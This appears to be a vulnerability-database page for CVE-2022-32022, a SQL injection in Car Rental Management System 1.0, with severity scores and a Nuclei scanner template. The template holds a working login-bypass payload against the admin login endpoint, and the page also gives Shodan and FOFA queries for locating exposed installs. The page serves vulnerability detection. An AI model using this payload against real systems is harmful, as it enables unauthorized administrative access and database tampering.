Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-32022
HistoryJul 31, 2022 - 9:05 p.m.

Car Rental Management System 1.0 - SQL Injection

2022-07-3121:05:13
ProjectDiscovery
github.com
5

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.3 High

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.4%

Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-32022

info:
  name: Car Rental Management System 1.0 - SQL Injection
  author: arafatansari
  severity: high
  description: |
    Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32022
    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-32022
    cwe-id: CWE-89
    epss-score: 0.00897
    epss-percentile: 0.80882
    cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: car_rental_management_system_project
    product: car_rental_management_system
    shodan-query:
      - http.html:"Car Rental Management System"
      - http.html:"car rental management system"
    fofa-query: body="car rental management system"
  tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project

http:
  - raw:
      - |
        POST /admin/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3D'1'%23&password=admin
      - |
        GET /admin/index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Welcome back Administrator!'
          - 'action=logout'
          - 'Manage Account'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cc27277c803c1fe75a0b6ba5afe9ca72046fd50814a54f78146326d2069cacfb02200cd80109cd1d3091883f225f3b5d86bd29af79f93d25ffe829656c45f7e33189:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.3 High

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.4%

Related for NUCLEI:CVE-2022-32022